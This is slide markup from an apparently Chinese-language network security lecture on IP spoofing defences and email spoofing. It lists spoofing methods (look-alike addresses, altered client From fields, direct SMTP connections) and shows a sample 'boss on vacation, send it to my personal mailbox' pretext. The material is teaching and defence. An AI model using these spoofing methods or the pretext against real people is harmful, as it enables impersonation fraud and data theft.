              <a:off x="2160" y="618"/>
              <a:ext cx="1504" cy="1270"/>
              <a:chOff x="2160" y="618"/>
              <a:chExt cx="1504" cy="1270"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28688"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89" name="Group 28"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2160" y="618"/>
                <a:ext cx="1504" cy="862"/>
                <a:chOff x="2160" y="618"/>
                <a:chExt cx="1504" cy="862"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28690" name="Group 19"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2472" y="844"/>
                  <a:ext cx="907" cy="636"/>
                  <a:chOff x="4560" y="3168"/>
                  <a:chExt cx="974" cy="732"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="28692" name="Picture 20" descr="j01497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zh-CN" altLang="en-US" sz="1600" b="1"/>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="28691" name="Text Box 22"/>
                <p:cNvSpPr txBox="1">
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2160" y="618"/>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r>
                    <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                      <a:solidFill>
                        <a:srgbClr val="CC0000"/>
                      </a:solidFill>
                      <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                    </a:rPr>
                    <a:t>安全需求与策略</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
                    <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="28683" name="Group 35"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2423" y="3067"/>
              <a:ext cx="1177" cy="1013"/>
              <a:chOff x="2423" y="3067"/>
              <a:chExt cx="1177" cy="1013"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28684"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28685" name="Group 30"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2423" y="3484"/>
                <a:ext cx="1177" cy="596"/>
                <a:chOff x="2423" y="3484"/>
                <a:chExt cx="1177" cy="596"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="28686"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eaLnBrk="1" hangingPunct="1"/>
                  <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
                    <a:solidFill>
                      <a:srgbClr val="CC0000"/>
                    </a:solidFill>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="28687"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400" b="1">
                      <a:solidFill>
                        <a:srgbClr val="CC0000"/>
                      </a:solidFill>
                      <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                    </a:rPr>
                    <a:t>安全机制</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                    <a:solidFill>
                      <a:srgbClr val="CC0000"/>
                    </a:solidFill>
                    <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28675" name="Picture 7" descr="BS00294_"/>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7273794" y="2554204"/>
            <a:ext cx="693999" cy="506037"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Oval 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3131722" y="1242218"/>
            <a:ext cx="2971800" cy="5463381"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="lgDash"/>
            <a:round/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5816600" y="1796967"/>
            <a:ext cx="229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rPr>
              <a:t>Security Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主机保护</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>保护自己的机器不被用来实施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>保护自己的机器不被成为假冒的对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络防护</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>路由器上设置过滤器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>入口过滤，外来的包带有内部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>出口过滤，内部的包带有外部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>保护免受源路由攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>路由器上禁止这样的数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234498" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如何避免</a:t>
            </a:r>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36AD8570-6681-4327-8BFC-F585C1774362}"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4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4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44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44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44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449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44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4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Lst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide26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35523" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>电子邮件欺骗的动机</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>匿名信</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗的形式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用类似的电子邮件地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>修改邮件客户软件的账号配置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>直接连到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>smtp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务器上发信</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235522" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>电子邮件欺骗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4D64A73E-3B3A-4B19-83B9-B67A0A81D187}"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3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55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355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autoUpdateAnimBg="0" build="p"/>
    </p:bld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r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发信人使用被假冒者的名字注册一个账号，然后给目标发送一封正常的信</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236546" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>电子邮件欺骗：使用类似的地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{12B9B9DD-50B3-40BB-A4C2-91BDE63478D8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="236549" name="Picture 5" descr="j0292020"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="973138" y="3860800"/>
            <a:ext cx="1296987" cy="1230313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="236550" name="Picture 6" descr="j0195384"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5726113" y="2781300"/>
            <a:ext cx="1409700" cy="1439863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236554" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2268538" y="3573463"/>
            <a:ext cx="3313112" cy="792162"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="236555" name="Picture 11" descr="j0285698"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5724525" y="4365625"/>
            <a:ext cx="1212850" cy="1296988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236556" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-755554">
            <a:off x="2268538" y="3141663"/>
            <a:ext cx="3168650" cy="822325"/>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我是你的上司</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，请把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>发送给我</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236557" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-755554">
            <a:off x="2486025" y="4005263"/>
            <a:ext cx="3168650" cy="822325"/>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我在外面度假，请送到我的个人信箱</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236558" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="7308850" y="3573463"/>
            <a:ext cx="1584325" cy="792162"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 65727"/>
              <a:gd name="adj2" fmla="val 100296"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rot="10800000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>她</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>能识别吗？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304"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8" grpId="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide263.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38595" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>邮件帐户配置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>姓名属性，会出现在“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>From”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>和“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Reply-To</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>”字段中，然后显示在“发件人”信息中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>电子邮件地址，会出现在“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>From”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>字段中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238594" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>帐户配置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="灯片编号占位符 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BF14290-BB14-427E-92C3-96CCC7347300}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="238603" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3657600"/>
            <a:ext cx="4210050" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="238605" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="6172200"/>
            <a:ext cx="5076825" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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8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385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autoUpdateAnimBg="0" build="p"/>
    </p:bld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743" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3347864" y="1988840"/>
            <a:ext cx="5001323" cy="3877216"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244738" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>邮件欺骗：直接连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"/>
              <a:t>smtp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B3B058DF-BDE7-4891-B315-7FA65668AC9B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244745" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
